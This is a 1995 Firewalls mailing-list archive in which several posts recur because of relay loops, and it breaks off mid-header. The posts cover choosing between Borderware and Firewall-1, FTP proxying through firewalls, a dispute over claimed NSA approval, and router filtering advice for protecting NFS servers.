cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.075007.0.8826; Thu, 05 Oct 1995 07:50:07 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124655.0.11870; Thu, 05 Oct 1995 07:50:07 -0500 From: RTATE@folio.com (RTATEfolio.com) To: cmilam@cap.au.af.mil , firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.124655.0.11870@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 07:50:07 -0500 Subject: Borderware vs. Firewall-1 Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124234.0.8747; Wed, 04 Oct 1995 12:42:35 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjxm10004; Tue, 3 Oct 1995 19:43:45 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28611 for firewalls-outgoing; Tue, 3 Oct 1995 16:05:44 -0700 Received: from folio.com (smtpgate.folio.com [198.60.24.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28604 for ; Tue, 3 Oct 1995 16:05:41 -0700 From: RTATE@folio.com Received: from FOLIO_PRIMARY_DOMAIN-Message_Server by folio.com with WordPerfect_Office; Tue, 03 Oct 1995 17:07:44 -0600 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Tue, 03 Oct 1995 17:05:45 -0600 To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Thu Oct 5 11:07:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00640 for firewalls-outgoing; Thu, 5 Oct 1995 10:33:56 -0700 Received: from spaatz.cap.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA00604 for ; Thu, 5 Oct 1995 10:33:46 -0700 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.114159.0.13101; Thu, 05 Oct 1995 12:32:30 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil (cmilam), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.114159.0.13101@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 12:32:30 -0500 Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: <1995Oct05.092558.0.12470@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:59:08 -0500 Subject: Need Windows FTP client source Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.092345.0.8927; Thu, 05 Oct 1995 09:23:46 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.083200.0.12078; Thu, 05 Oct 1995 09:23:46 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil (cmilam), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.083200.0.12078@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 09:23:46 -0500 Subject: Need Windows FTP client source Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.083256.0.8879; Thu, 05 Oct 1995 08:32:56 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080000.0.11977; Thu, 05 Oct 1995 08:32:56 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil (cmilam), firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.080000.0.11977@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 08:32:56 -0500 Subject: Need Windows FTP client source Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080028.0.8843; Thu, 05 Oct 1995 08:00:28 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.11908; Thu, 05 Oct 1995 08:00:28 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil , firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.071240.0.11908@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 08:00:28 -0500 Subject: Need Windows FTP client source Received: from relay3.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.070658.0.8812; Thu, 05 Oct 1995 07:06:59 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQzjxg07039; Tue, 3 Oct 1995 18:08:55 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23435 for firewalls-outgoing; Tue, 3 Oct 1995 13:47:43 -0700 Received: from ns.via.net (ns.via.net [140.174.204.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23422 for ; Tue, 3 Oct 1995 13:47:38 -0700 Received: (from joe@localhost) by ns.via.net (8.6.9/8.6.9) id NAA07589 for firewalls@GreatCircle.COM; Tue, 3 Oct 1995 13:46:08 -0700 Date: Tue, 3 Oct 1995 13:46:08 -0700 From: Joe McGuckin Message-Id: <199510032046.NAA07589@ns.via.net> To: firewalls@GreatCircle.COM Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need a windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy. The problem is that most of the gui based windows FTP clients don't have a command line or a logging window to view status messages, etc. Any suggestions? -joe From firewalls-owner Thu Oct 5 11:10:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26265 for firewalls-outgoing; Thu, 5 Oct 1995 08:40:21 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26258 for ; Thu, 5 Oct 1995 08:40:15 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124656.0.12147; Thu, 05 Oct 1995 10:38:59 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.124656.0.12147@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:38:59 -0500 Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from spaatz.cap.af.mil by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124345.0.8756; Wed, 04 Oct 1995 12:43:45 -0500 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123823.0.11762; Wed, 04 Oct 1995 12:43:45 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil , firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.123823.0.11762@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Wed, 04 Oct 1995 12:43:45 -0500 Subject: re: Encryption Strength Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123619.0.8704; Wed, 04 Oct 1995 12:36:20 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjzx29201; Wed, 4 Oct 1995 11:18:20 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14097 for firewalls-outgoing; Wed, 4 Oct 1995 06:47:14 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA14083 for ; Wed, 4 Oct 1995 06:47:10 -0700 Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com> Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Would it suffice to say that it was good enough for NSA - and that it is the >*only* Internet firewall used in a NSA-approved configuration? In a public >forum, this is probably all I can say. No, a) Cryptic remarks like that have no place on a public forum IMNSHO and are considered free of content. Better not to be said at all. b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not mentioned. Asked specifically about firewalls (true those folks do not volunteer and I was asking about another subject but did ask specifically which firewalls had been "examined"). c) "Security by obscurity" rates a "Run, do not Walk". d) "Assume" you refer to the MISSI stuff approved for connection of up-to-Secret LANs to unclassified. Those I know of still require an out-of-channel exchange to take place to define "trust". e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips. Warmly, Padgett From firewalls-owner Thu Oct 5 11:12:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26566 for firewalls-outgoing; Thu, 5 Oct 1995 08:50:38 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26559 for ; Thu, 5 Oct 1995 08:50:34 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.073459.0.12245; Thu, 05 Oct 1995 10:49:17 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct05.073459.0.12245@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:49:17 -0500 Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.073230.0.8821; Thu, 05 Oct 1995 07:32:30 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124656.0.11860; Thu, 05 Oct 1995 07:32:30 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.124656.0.11860@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 07:32:30 -0500 Subject: re: Encryption Strength Received: from spaatz.cap.af.mil by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124345.0.8756; Wed, 04 Oct 1995 12:43:45 -0500 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123823.0.11762; Wed, 04 Oct 1995 12:43:45 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil , firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.123823.0.11762@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Wed, 04 Oct 1995 12:43:45 -0500 Subject: re: Encryption Strength Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123619.0.8704; Wed, 04 Oct 1995 12:36:20 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjzx29201; Wed, 4 Oct 1995 11:18:20 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14097 for firewalls-outgoing; Wed, 4 Oct 1995 06:47:14 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA14083 for ; Wed, 4 Oct 1995 06:47:10 -0700 Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com> Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Would it suffice to say that it was good enough for NSA - and that it is the >*only* Internet firewall used in a NSA-approved configuration? In a public >forum, this is probably all I can say. No, a) Cryptic remarks like that have no place on a public forum IMNSHO and are considered free of content. Better not to be said at all. b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not mentioned. Asked specifically about firewalls (true those folks do not volunteer and I was asking about another subject but did ask specifically which firewalls had been "examined"). c) "Security by obscurity" rates a "Run, do not Walk". d) "Assume" you refer to the MISSI stuff approved for connection of up-to-Secret LANs to unclassified. Those I know of still require an out-of-channel exchange to take place to define "trust". e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips. Warmly, Padgett From firewalls-owner Thu Oct 5 11:13:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26797 for firewalls-outgoing; Thu, 5 Oct 1995 08:55:28 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26790 for ; Thu, 5 Oct 1995 08:55:22 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080850.0.12314; Thu, 05 Oct 1995 10:54:05 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct05.080850.0.12314@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 10:54:05 -0500 Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.080432.0.8851; Thu, 05 Oct 1995 08:04:32 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.073459.0.11920; Thu, 05 Oct 1995 08:04:32 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct05.073459.0.11920@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 08:04:32 -0500 Subject: re: Encryption Strength Received: from cap.au.af.mil by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.073230.0.8821; Thu, 05 Oct 1995 07:32:30 -0500 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124656.0.11860; Thu, 05 Oct 1995 07:32:30 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil (cmilam), firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.124656.0.11860@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 07:32:30 -0500 Subject: re: Encryption Strength Received: from spaatz.cap.af.mil by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.124345.0.8756; Wed, 04 Oct 1995 12:43:45 -0500 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123823.0.11762; Wed, 04 Oct 1995 12:43:45 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil , firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.123823.0.11762@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Organization: Civil Air Patrol National Headquarters Date: Wed, 04 Oct 1995 12:43:45 -0500 Subject: re: Encryption Strength Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123619.0.8704; Wed, 04 Oct 1995 12:36:20 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjzx29201; Wed, 4 Oct 1995 11:18:20 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14097 for firewalls-outgoing; Wed, 4 Oct 1995 06:47:14 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA14083 for ; Wed, 4 Oct 1995 06:47:10 -0700 Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com> Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Would it suffice to say that it was good enough for NSA - and that it is the >*only* Internet firewall used in a NSA-approved configuration? In a public >forum, this is probably all I can say. No, a) Cryptic remarks like that have no place on a public forum IMNSHO and are considered free of content. Better not to be said at all. b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not mentioned. Asked specifically about firewalls (true those folks do not volunteer and I was asking about another subject but did ask specifically which firewalls had been "examined"). c) "Security by obscurity" rates a "Run, do not Walk". d) "Assume" you refer to the MISSI stuff approved for connection of up-to-Secret LANs to unclassified. Those I know of still require an out-of-channel exchange to take place to define "trust". e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips. Warmly, Padgett From firewalls-owner Thu Oct 5 11:14:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27265 for firewalls-outgoing; Thu, 5 Oct 1995 09:09:32 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA27251 for ; Thu, 5 Oct 1995 09:09:25 -0700 Date: Thu, 5 Oct 1995 12:07:48 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951005120748.21066a30@hobbes.orl.mmc.com> Subject: Re: FTPing through a smart firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Vessa commented that this seemed difficult (someone else's post): > slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary > address assignments, and accomplishes its goals without any layering > violations -- in particular the user data is never interpreted. Really not difficult at all provided standard conventions are followed: Node makes Port 21 connection to DE along with PORT command. Firewall sees this and watches for return from same DE port 20 addressed to same node. Can assume from the requested port on the internal node is the requested one, never needs to read/interpret the PORT command since the response header contains all necessary port information (and is good to open data channel only if command channel was previously opened). Warmly, Padgett From firewalls-owner Thu Oct 5 11:16:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00738 for firewalls-outgoing; Thu, 5 Oct 1995 10:35:42 -0700 Received: from spaatz.cap.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA00710 for ; Thu, 5 Oct 1995 10:35:34 -0700 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.114209.0.13165; Thu, 05 Oct 1995 12:34:17 -0500 From: Pat_Heinle@STAR9GATE.MITRE.ORG (Pat Heinle) To: cmilam@cap.au.af.mil (cmilam), Firewalls@GreatCircle.COM (Firewalls) Message-ID: <1995Oct05.114209.0.13165@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 12:34:17 -0500 Subject: Re: Firewalls-Digest V4 #573 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: <1995Oct05.103600.0.12572@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 11:01:17 -0500 Subject: Re: Firewalls-Digest V4 #573 Received: from relay2.UU.NET by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.103659.0.8957; Thu, 05 Oct 1995 10:37:00 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzkah20513; Wed, 4 Oct 1995 13:56:32 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA18290 for firewalls-outgoing; Wed, 4 Oct 1995 09:44:21 -0700 Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA18275 for ; Wed, 4 Oct 1995 09:44:07 -0700 Received: from star9gate.mitre.org (star9gate.mitre.org [129.83.22.1]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id MAA06776 for ; Wed, 4 Oct 1995 12:42:35 -0400 Message-ID: Date: 4 Oct 1995 12:46:35 -0500 From: "Pat Heinle" Subject: Re: Firewalls-Digest V4 #573 To: Firewalls@GreatCircle.COM X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reply to: RE>Firewalls-Digest V4 #573 From: pheinle@mitre.org Subject: RE> Borderware vs. Firewall-1 Mr. Tate asks: I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? rtate@folio.com -- Robert, "Info Security News" just had a supplement to their magazine for Sept/Oct. 95 entitled "Internet Security." Within the "Internet Security" supplement was a section -Shopping for Firewalls which contained a matrix of a majority of the current firewall products and their attributes. It might provided some additional insight. In addition, to your Security Policy which Luc noted in his response, another issue to consider is how well the Firewall product adjusts as your enterprise expands. Good luck. Patty -------------------------------------- Date: 10/4/95 11:34 AM To: Pat Heinle From: Firewalls@GreatCircle.COM !!! Original message was too large. !!! !!! It is contained in the enclosure whose name !!! is the same as the subject of this message. !!! !!! A preview of the message follows: Firewalls-Digest Wednesday, 4 October 1995 Volume 04 : Number 573 In this issue: -No Subject- IRC FLEXlm with proxy ...? Re: NFS Need Windows FTP client source Borderware (was: Information, We want information) Re: Encryption strength Borderware vs. Firewall-1 Exact format for subscribing the info security list. re: Encryption strength re re nfs Re: Mail Proxy Re: FW to FW FTP w/ no port > 1023 re: Encryption strength re: network address translation RE: Borderware vs. Firewall-1 [none] Re: Encryption strength Re: Mail proxy See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: Joseph Urban Date: 3 Oct 95 14:12:00 Subject: -No Subject- sunscribe firewalls-digest ------------------------------ From: oddboy@vegas.com Date: Tue, 3 Oct 1995 11:42:44 -0700 Subject: IRC I find myself in the position of having to put up a private IRC server (private being not connected to either Undernet or Efnet). Basically this is to allow "chat" forums for a few of my clients. I would like to make these chat lines live outside of my firewall (and plan on it) nut am curious what I should watch out for in terms of folks being able to hack through and into an OS. (i run solaris2.4 but I think the IRC server will run on a DEC box running OSF/DecUnix. Any and all info will be greatly appreciated. Gideon Wober Systems Administrator Digitainment Corporation ------------------------------ From: jordan@Heuristicrat.COM (Jordan M. Hayes) Date: Tue, 3 Oct 95 12:09:16 PDT Subject: FLEXlm with proxy ...? Anyone built a FLEXlm proxy for FWTK? /jordan ------------------------------ From: Doug Hughes Date: Tue, 3 Oct 1995 13:42:56 -0500 Subject: Re: NFS > >I am sure that this topic has been beaten to death, so if someone would >just point me at the discussion (or tell me that there is no solution) >I would be happy to take it from there. I remember reading a paper a >couple years ago describing why NFS could never be made secure, but for >the life of me I cant seem to find it now. > >The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >dozen file systems that are exported read-only to all the other machines >in the domain. I would like to restrict their mounting to machines within >the domain while maintaining connectivity to the outside world. >SUN's software does not support this option, it only allows specifying >specific machine names, and the list of *all* machine names overflows >some internal limit in SUN's software. > >[ The machine uses DNS and not YP, it is rumored that possibly with YP one >can get by this limit, but I have no interest in adding YP to my list of >problems. ] > >So, the Questions > > (1) WITHOUT resorting to a firewall, is there any way to accomplish >what I want to do? > > (2) If not, can it be done with a `simple' packet filter, or does it >require a full blown firewall? > > > Reg.Clemens > clemens@dwf.com > > > Without necessary resorting to a firewall, you can have your router to the outside world block: port 2049/udp - NFS port 111 udp/tcp - Sun RPC source routed packets outside packets with internal IP source addresses (IP spoofing) This helps prevent a great deal of the most common attacks on NFS by preventing it getting outside your domain at the interface to the Internet. also, installing the replacement tcp_wrappered version of portmap on your NFS servers from ftp.win.tue.nl is also a good thing to do. This way you can limit what networks are able to send RPC requests to your server. - -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" ------------------------------ From: Joe McGuckin Date: Tue From firewalls-owner Thu Oct 5 11:20:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27808 for firewalls-outgoing; Thu, 5 Oct 1995 09:24:30 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA27796 for ; Thu, 5 Oct 1995 09:24:25 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.071240.0.12661; Thu, 05 Oct 1995 11:23:08 -0500 From: joe@ns.via.net (Joe McGuckin) To: cmilam@cap.au.af.mil, firewalls@GreatCircle.COM (firewalls) Message-ID: <1995Oct05.071240.0.12661@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 11:23:08 -0500 Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from relay3.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id 